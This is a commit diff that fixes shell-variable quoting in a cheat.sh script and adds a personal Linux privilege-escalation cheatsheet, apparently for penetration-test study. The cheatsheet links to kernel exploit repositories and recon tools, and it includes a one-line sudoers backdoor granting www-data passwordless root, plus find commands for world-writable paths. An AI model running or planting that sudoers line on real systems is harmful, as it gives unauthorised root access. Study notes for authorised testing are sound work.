renames

cheat.sh

@@ -19,7 +19,7 @@ function usage {
 
 # Set the path to the cheatncheck repo here
 
-if [ $CHEAT = "" ]; then
+if [ "$CHEAT" = "" ]; then
     cheatsheets="$HOME/documents/cheatsheets/"
 else
     cheatsheets="$CHEAT"

cheatsheets/security/linux/linux-privilege-escalation.md

@@ -0,0 +1,52 @@
+---
+title: Linux Privilege Escalation
+categories: [cheatsheets]
+tags: [topic]
+---
+
+# Linux Privilege Escalation
+
+* interesting article: https://www.hackingarticles.in/linux-privilege-escalation-via-automated-script/
+
+## Kernel Explotis
+
+* Get the version of the Linux Kernel with `uname -a`
+* Use searchsploit e.g. and search for an exploit
+* Use Exploit-Suggestor (https://github.com/jondonas/linux-exploit-suggester-2)
+
+
+### Following Github Repos could be useful
+
+* (source) https://github.com/SecWiki/linux-kernel-exploits
+* (precompiled) https://github.com/pythonmaster41/Go-For-OSCP/
+* (precompiled) https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack/
+* (source) https://github.com/lucyoa/kernel-exploits
+
+
+## Information Gathering
+
+### Automated Recon
+
+* LinEnum (https://github.com/rebootuser/LinEnum)
+* LinuxPrivChecker (https://github.com/sleventyeleven/linuxprivchecker)
+*
+
+
+### Useful Snippets
+
+* When getting a root user to run a script:
+
+```
+echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
+```
+
+* Word Writeable Stuff
+```
+find / -writable -type d 2>/dev/null      # world-writeable folders
+find / -perm -222 -type d 2>/dev/null     # world-writeable folders
+find / -perm -o w -type d 2>/dev/null     # world-writeable folders
+
+find / -perm -o w -type f 2>/dev/null     # world-writeable files
+find / -perm -o x -type d 2>/dev/null     # world-executable folders
+```
+